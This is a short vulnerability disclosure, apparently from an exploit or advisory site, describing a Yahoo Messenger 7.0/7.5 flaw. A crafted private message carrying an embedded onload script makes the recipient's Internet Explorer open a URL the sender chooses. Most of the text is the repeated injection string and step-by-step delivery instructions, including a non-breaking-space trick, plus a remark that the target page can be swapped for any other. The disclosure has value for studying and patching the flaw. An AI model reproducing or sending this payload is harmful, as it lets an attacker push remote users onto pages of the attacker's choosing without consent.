|
I found another vulnerability in yahoo messenger (i'm the discoverer of Yahoo messenger handling denial of service) that if you receive a Private message with this string "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (without quotes) Yahoo messenger open in this case google.com in the internet explorer of the remote victim. Yahoo messenger bug proof of concept: 1. Open messenger and log it. 2. Open a yahoo chat third party like yahelite through Ymsgr protocol and log it with another account. 3. Send a Pm to the messenger account with this string: s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( 4. The remote user will open www.google.com (you can change) Note: "helomsg :" this space must be created with alt+0160 and this "s: " with a space s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( Tested in yahoo messenger 7.0/7.5 Note: Obviously you can change the page for the desired.
Related Items:
|
